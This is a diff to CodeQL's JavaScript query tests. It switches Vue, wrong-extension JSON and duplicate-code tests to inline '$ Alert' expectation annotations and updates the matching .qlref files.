--- a/javascript/ql/test/query-tests/Vue/tst.js +++ b/javascript/ql/test/query-tests/Vue/tst.js @@ -1,16 +1,16 @@ let Vue = require('vue'); new Vue( { - created: () => this, // NOT OK + created: () => this, // $ Alert computed: { - x: () => this, // NOT OK - y: { get: () => this }, // NOT OK - z: { set: () => this } // NOT OK + x: () => this, // $ Alert + y: { get: () => this }, // $ Alert + z: { set: () => this } // $ Alert }, methods: { - arrow: () => this, // NOT OK - nonArrow: function() { this; }, // OK - arrowWithoutThis: () => 42, // OK - arrowWithNestedThis: () => (() => this) // OK + arrow: () => this, // $ Alert + nonArrow: function() { this; }, + arrowWithoutThis: () => 42, + arrowWithNestedThis: () => (() => this) } }); diff --git a/javascript/ql/test/query-tests/WrongExtensionJSON/WrongExtensionJSON.qlref b/javascript/ql/test/query-tests/WrongExtensionJSON/WrongExtensionJSON.qlref index d56ea60e9fdd..a93cc8ddc977 100644 --- a/javascript/ql/test/query-tests/WrongExtensionJSON/WrongExtensionJSON.qlref +++ b/javascript/ql/test/query-tests/WrongExtensionJSON/WrongExtensionJSON.qlref @@ -1 +1 @@ -LanguageFeatures/WrongExtensionJSON.ql \ No newline at end of file +query: LanguageFeatures/WrongExtensionJSON.ql diff --git a/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js b/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js index 5741191d62d3..fef5cb07408f 100644 --- a/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js +++ b/javascript/ql/test/query-tests/WrongExtensionJSON/tst1.js @@ -1,3 +1,3 @@ { "x": 42 -} \ No newline at end of file +} // $ Alert \ No newline at end of file diff --git a/javascript/ql/test/query-tests/external/DuplicateFunction/DuplicateFunction.qlref b/javascript/ql/test/query-tests/external/DuplicateFunction/DuplicateFunction.qlref index cb39dcf5719c..66276914680d 100644 --- a/javascript/ql/test/query-tests/external/DuplicateFunction/DuplicateFunction.qlref +++ b/javascript/ql/test/query-tests/external/DuplicateFunction/DuplicateFunction.qlref @@ -1 +1,2 @@ -external/DuplicateFunction.ql \ No newline at end of file +query: external/DuplicateFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js b/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js index e6c6509eca6e..652853b992e9 100644 --- a/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js +++ b/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js @@ -31,7 +31,7 @@ var g2 = function() { return arguments[0] * arguments[1]; } -// OK: only five statements +// OK - only five statements function h() { if (arguments.length == 0) return 23; diff --git a/javascript/ql/test/query-tests/external/DuplicateToplevel/DuplicateToplevel.qlref b/javascript/ql/test/query-tests/external/DuplicateToplevel/DuplicateToplevel.qlref index c295d00ec6d4..476c8ffb823d 100644 --- a/javascript/ql/test/query-tests/external/DuplicateToplevel/DuplicateToplevel.qlref +++ b/javascript/ql/test/query-tests/external/DuplicateToplevel/DuplicateToplevel.qlref @@ -1 +1,2 @@ -external/DuplicateToplevel.ql \ No newline at end of file +query: external/DuplicateToplevel.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/external/SimilarFunction/SimilarFunction.qlref b/javascript/ql/test/query-tests/external/SimilarFunction/SimilarFunction.qlref index 6b4f3db02847..35c422516f5a 100644 --- a/javascript/ql/test/query-tests/external/SimilarFunction/SimilarFunction.qlref +++ b/javascript/ql/test/query-tests/external/SimilarFunction/SimilarFunction.qlref @@ -1 +1,2 @@ -external/SimilarFunction.ql \ No newline at end of file +query: external/SimilarFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/external/SimilarToplevel/SimilarToplevel.qlref b/javascript/ql/test/query-tests/external/SimilarToplevel/SimilarToplevel.qlref index c42b2ee3ded1..42de32840c62 100644 --- a/javascript/ql/test/query-tests/external/SimilarToplevel/SimilarToplevel.qlref +++ b/javascript/ql/test/query-tests/external/SimilarToplevel/SimilarToplevel.qlref @@ -1 +1,2 @@ -external/SimilarToplevel.ql \ No newline at end of file +query: external/SimilarToplevel.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql